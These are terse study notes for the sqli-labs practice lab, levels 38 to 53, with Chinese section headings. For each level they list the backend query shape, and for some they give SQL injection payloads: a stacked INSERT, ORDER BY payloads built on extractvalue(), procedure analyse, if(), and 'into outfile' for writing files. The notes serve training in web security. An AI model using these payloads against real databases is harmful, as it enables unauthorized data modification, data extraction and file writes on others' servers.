sqli-lab(Stacked)

(堆叠注入)
Less-38:

select * from table where id='1';
';insert into user values(20,'test','test')%23

Less-39:
select * from table where id=1;

Less-40:
select * from table where id=('1');

Less-41:
select * from table where id=1;

Less-42:
select * from table where username='admin' and password='admin';
password处注入

Less-43:
select * from table where username=('admin') and password=('admin');

Less-44:
select * from table where username='admin' and password='admin';

Less-45:
select * from table where username=('admin') and password=('admin');

 

(order by注入)
Less-46:

select * from table  order by 1;
?sort=rand(1)
?sort=1 and extractvalue()
?sort=1  procedure analyse(extractvalue(),1)
?sort=1 into outfile "path"

Less-47:
select * from table order by '1;
?sort=1' and extractvalue()%23

Less-48:
select *& from table order by 1;
?sort=if()

Less-49:
select * from table order by '1;

(堆叠order by注入)
Less-50:

select *& from table order by 1;

Less-51:
select *& from table order by '1';

Less-52:
select *& from table order by 1;

Less-53:
select *& from table order by '1';